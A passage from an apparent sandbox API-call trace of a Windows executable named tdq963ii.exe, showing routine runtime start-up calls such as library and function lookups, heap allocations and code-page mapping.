lpProcName="TlsGetValue") returned 0x76d411e0 [0220.519] GetProcAddress (hModule=0x76d30000, lpProcName="TlsSetValue") returned 0x76d414fb [0220.520] GetProcAddress (hModule=0x76d30000, lpProcName="TlsFree") returned 0x76d43587 [0220.520] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidCodePage") returned 0x76d44493 [0220.520] GetProcAddress (hModule=0x76d30000, lpProcName="GetACP") returned 0x76d4179c [0220.521] GetProcAddress (hModule=0x76d30000, lpProcName="GetOEMCP") returned 0x76d6d1a1 [0220.521] GetProcAddress (hModule=0x76d30000, lpProcName="GetCPInfo") returned 0x76d45189 [0220.521] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcessHeap") returned 0x76d414e9 [0220.521] GetProcAddress (hModule=0x76d30000, lpProcName="RtlUnwind") returned 0x76d6d1c3 [0220.521] GetProcAddress (hModule=0x76d30000, lpProcName="QueryPerformanceCounter") returned 0x76d41725 [0220.521] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessId") returned 0x76d411f8 [0220.521] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemTimeAsFileTime") returned 0x76d43509 [0220.521] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentStringsW") returned 0x76d451e3 [0220.522] GetProcAddress (hModule=0x76d30000, lpProcName="FreeEnvironmentStringsW") returned 0x76d451cb [0220.522] GetProcAddress (hModule=0x76d30000, lpProcName="HeapReAlloc") returned 0x77c81f6e [0220.522] GetProcAddress (hModule=0x76d30000, lpProcName="SetEndOfFile") returned 0x76d5ce2e [0220.522] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77710000 [0220.522] GetProcAddress (hModule=0x77710000, lpProcName="GetTokenInformation") returned 0x7772431c [0220.522] GetProcAddress (hModule=0x77710000, lpProcName="RegDeleteKeyW") returned 0x77721272 [0220.523] GetProcAddress (hModule=0x77710000, lpProcName="LookupPrivilegeValueW") returned 0x777241b3 [0220.523] GetProcAddress (hModule=0x77710000, lpProcName="AdjustTokenPrivileges") returned 0x7772418e [0220.523] GetProcAddress (hModule=0x77710000, lpProcName="OpenProcessToken") returned 0x77724304 [0220.523] GetProcAddress (hModule=0x77710000, lpProcName="RegSetValueExW") returned 0x777214d6 [0220.523] GetProcAddress (hModule=0x77710000, lpProcName="RegQueryValueExW") returned 0x777246ad [0220.523] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExW") returned 0x7772468d [0220.523] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyW") returned 0x77722459 [0220.524] GetProcAddress (hModule=0x77710000, lpProcName="RegCreateKeyW") returned 0x77721514 [0220.524] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0220.524] GetProcAddress (hModule=0x77710000, lpProcName="LookupAccountSidW") returned 0x77724874 [0220.524] LoadLibraryA (lpLibFileName="COMDLG32.dll") returned 0x77270000 [0220.524] GetProcAddress (hModule=0x77270000, lpProcName="PrintDlgW") returned 0x772733a3 [0220.524] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x770a0000 [0220.524] GetProcAddress (hModule=0x770a0000, lpProcName="StartPage") returned 0x770e401a [0220.524] GetProcAddress (hModule=0x770a0000, lpProcName="EndDoc") returned 0x770e3f29 [0220.524] GetProcAddress (hModule=0x770a0000, lpProcName="StartDocW") returned 0x770e4c51 [0220.525] GetProcAddress (hModule=0x770a0000, lpProcName="SetMapMode") returned 0x770bb02f [0220.525] GetProcAddress (hModule=0x770a0000, lpProcName="GetDeviceCaps") returned 0x770b4de0 [0220.525] GetProcAddress (hModule=0x770a0000, lpProcName="EndPage") returned 0x770c6bde [0220.525] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x77130000 [0220.525] GetProcAddress (hModule=0x77130000, lpProcName="SendMessageW") returned 0x77149679 [0220.525] GetProcAddress (hModule=0x77130000, lpProcName="DialogBoxIndirectParamW") returned 0x7716cbf3 [0220.525] GetProcAddress (hModule=0x77130000, lpProcName="EndDialog") returned 0x7716b99c [0220.525] GetProcAddress (hModule=0x77130000, lpProcName="LoadCursorW") returned 0x771488f7 [0220.526] GetProcAddress (hModule=0x77130000, lpProcName="InflateRect") returned 0x77153309 [0220.526] GetProcAddress (hModule=0x77130000, lpProcName="GetSysColorBrush") returned 0x771535a4 [0220.526] GetProcAddress (hModule=0x77130000, lpProcName="SetCursor") returned 0x771541f6 [0220.526] GetProcAddress (hModule=0x77130000, lpProcName="SetWindowTextW") returned 0x771520ec [0220.526] GetProcAddress (hModule=0x77130000, lpProcName="GetDlgItem") returned 0x7716f1ba [0220.526] LoadLibraryA (lpLibFileName="VERSION.dll") returned 0x75440000 [0220.526] GetProcAddress (hModule=0x75440000, lpProcName="GetFileVersionInfoW") returned 0x754419f4 [0220.526] GetProcAddress (hModule=0x75440000, lpProcName="VerQueryValueW") returned 0x75441b51 [0220.526] GetProcAddress (hModule=0x75440000, lpProcName="GetFileVersionInfoSizeW") returned 0x754419d9 [0220.527] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x2) returned 1 [0221.200] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x4) returned 1 [0221.210] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff78 | out: lpSystemTimeAsFileTime=0x18ff78*(dwLowDateTime=0x3be33c40, dwHighDateTime=0x1d68287)) [0221.210] GetCurrentThreadId () returned 0xac4 [0221.210] GetCurrentProcessId () returned 0x38c [0221.210] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff70 | out: lpPerformanceCount=0x18ff70*=34154941955) returned 1 [0221.726] GetProcessHeap () returned 0x650000 [0221.774] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0221.774] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0221.775] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0221.776] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0221.776] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0221.776] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0221.776] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventExW") returned 0x76dc410b [0221.776] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSemaphoreExW") returned 0x76dc4195 [0221.776] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadStackGuarantee") returned 0x76d4d31f [0221.776] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolTimer") returned 0x76d5ee7e [0221.776] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolTimer") returned 0x77c8441c [0221.777] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x77cac50e [0221.777] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolTimer") returned 0x77cac381 [0221.777] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolWait") returned 0x76d5f088 [0221.777] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolWait") returned 0x77c905d7 [0221.777] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolWait") returned 0x77caca24 [0221.777] GetProcAddress (hModule=0x76d30000, lpProcName="FlushProcessWriteBuffers") returned 0x77c60b8c [0221.777] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x77d1fde8 [0221.778] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessorNumber") returned 0x77cb1e1d [0221.778] GetProcAddress (hModule=0x76d30000, lpProcName="GetLogicalProcessorInformation") returned 0x76dc4761 [0221.778] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSymbolicLinkW") returned 0x76dbcd11 [0221.778] GetProcAddress (hModule=0x76d30000, lpProcName="SetDefaultDllDirectories") returned 0x0 [0221.778] GetProcAddress (hModule=0x76d30000, lpProcName="EnumSystemLocalesEx") returned 0x76dc424f [0221.778] GetProcAddress (hModule=0x76d30000, lpProcName="CompareStringEx") returned 0x76dc46b1 [0221.778] GetProcAddress (hModule=0x76d30000, lpProcName="GetDateFormatEx") returned 0x76dd6676 [0221.778] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoEx") returned 0x76dc4751 [0221.778] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeFormatEx") returned 0x76dd65f1 [0221.779] GetProcAddress (hModule=0x76d30000, lpProcName="GetUserDefaultLocaleName") returned 0x76dc47c1 [0221.779] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidLocaleName") returned 0x76dc47e1 [0221.779] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringEx") returned 0x76dc47f1 [0221.779] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentPackageId") returned 0x0 [0221.779] GetProcAddress (hModule=0x76d30000, lpProcName="GetTickCount64") returned 0x76d5eee0 [0221.779] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0221.779] GetProcAddress (hModule=0x76d30000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0221.781] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x3bc) returned 0x6660c8 [0221.781] GetCurrentThreadId () returned 0xac4 [0221.781] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x666490 [0221.781] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x800) returned 0x6664b0 [0221.781] GetStartupInfoW (in: lpStartupInfo=0x18fed8 | out: lpStartupInfo=0x18fed8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="tdq963ii.exe -accepteula -c 158 -y -p 2880 -nobanner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x40ad42, hStdOutput=0xc9feb937, hStdError=0x0)) [0221.781] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0221.781] GetFileType (hFile=0x3) returned 0x2 [0222.275] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0222.275] GetFileType (hFile=0x7) returned 0x2 [0222.276] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0222.276] GetFileType (hFile=0xb) returned 0x2 [0222.276] GetCommandLineW () returned="tdq963ii.exe -accepteula -c 158 -y -p 2880 -nobanner" [0222.276] GetEnvironmentStringsW () returned 0x666cb8* [0222.277] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xb86) returned 0x667848 [0222.277] FreeEnvironmentStringsW (penv=0x666cb8) returned 1 [0222.278] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x426ea0, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x32 [0222.278] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8e) returned 0x666cb8 [0222.278] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xa0) returned 0x666d50 [0222.278] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x3e) returned 0x6683f0 [0222.278] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x6c) returned 0x666df8 [0222.279] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x6e) returned 0x666e70 [0222.279] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x78) returned 0x65f8e8 [0222.279] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x62) returned 0x666ee8 [0222.279] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x2e) returned 0x666f58 [0222.279] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x48) returned 0x666f90 [0222.279] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x2a) returned 0x666fe0 [0222.279] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x28) returned 0x667018 [0222.279] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x1a) returned 0x665a98 [0222.279] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x4a) returned 0x667048 [0222.279] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x72) returned 0x65f968 [0222.279] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x30) returned 0x6670a0 [0222.279] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x2e) returned 0x6670d8 [0222.279] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x1c) returned 0x665ac0 [0222.279] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xd2) returned 0x667110 [0222.279] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x7c) returned 0x6671f0 [0222.279] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x36) returned 0x667278 [0222.279] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x3a) returned 0x668438 [0222.279] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x90) returned 0x6672b8 [0222.279] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x24) returned 0x667350 [0222.279] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x30) returned 0x667380 [0222.279] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x36) returned 0x6673b8 [0222.280] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x48) returned 0x6673f8 [0222.280] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x52) returned 0x667448 [0222.280] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x3c) returned 0x668480 [0222.280] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x18) returned 0x6674a8 [0222.280] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x82) returned 0x6674c8 [0222.280] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x2e) returned 0x667558 [0222.280] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x1e) returned 0x665ae8 [0222.280] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x2c) returned 0x667590 [0222.280] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x54) returned 0x6675c8 [0222.280] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x52) returned 0x667628 [0222.280] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x2a) returned 0x667688 [0222.280] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x3c) returned 0x6684c8 [0222.280] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x54) returned 0x6676c0 [0222.280] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x24) returned 0x667720 [0222.280] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x30) returned 0x667750 [0222.280] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x8c) returned 0x667788 [0222.280] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x667848 | out: hHeap=0x650000) returned 1 [0222.282] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x800) returned 0x667820 [0222.282] GetLastError () returned 0x0 [0222.282] SetLastError (dwErrCode=0x0) [0222.282] GetLastError () returned 0x0 [0222.282] SetLastError (dwErrCode=0x0) [0222.282] GetLastError () returned 0x0 [0222.282] SetLastError (dwErrCode=0x0) [0222.282] GetACP () returned 0x4e4 [0222.283] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x220) returned 0x668028 [0222.283] GetLastError () returned 0x0 [0222.283] SetLastError (dwErrCode=0x0) [0222.283] IsValidCodePage (CodePage=0x4e4) returned 1 [0222.283] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fecc | out: lpCPInfo=0x18fecc) returned 1 [0222.283] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f994 | out: lpCPInfo=0x18f994) returned 1 [0222.283] GetLastError () returned 0x0 [0222.283] SetLastError (dwErrCode=0x0) [0222.283] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0222.283] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f718, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0222.283] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f9a8 | out: lpCharType=0x18f9a8) returned 1 [0222.283] GetLastError () returned 0x0 [0222.283] SetLastError (dwErrCode=0x0) [0222.283] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0222.283] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6e8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0222.283] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0222.283] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4d8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0222.283] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x18fca8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ§¸þÉäþ\x18", lpUsedDefaultChar=0x0) returned 256 [0222.283] GetLastError () returned 0x0 [0222.283] SetLastError (dwErrCode=0x0) [0222.284] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0222.284] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0222.284] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0222.284] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4e8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ 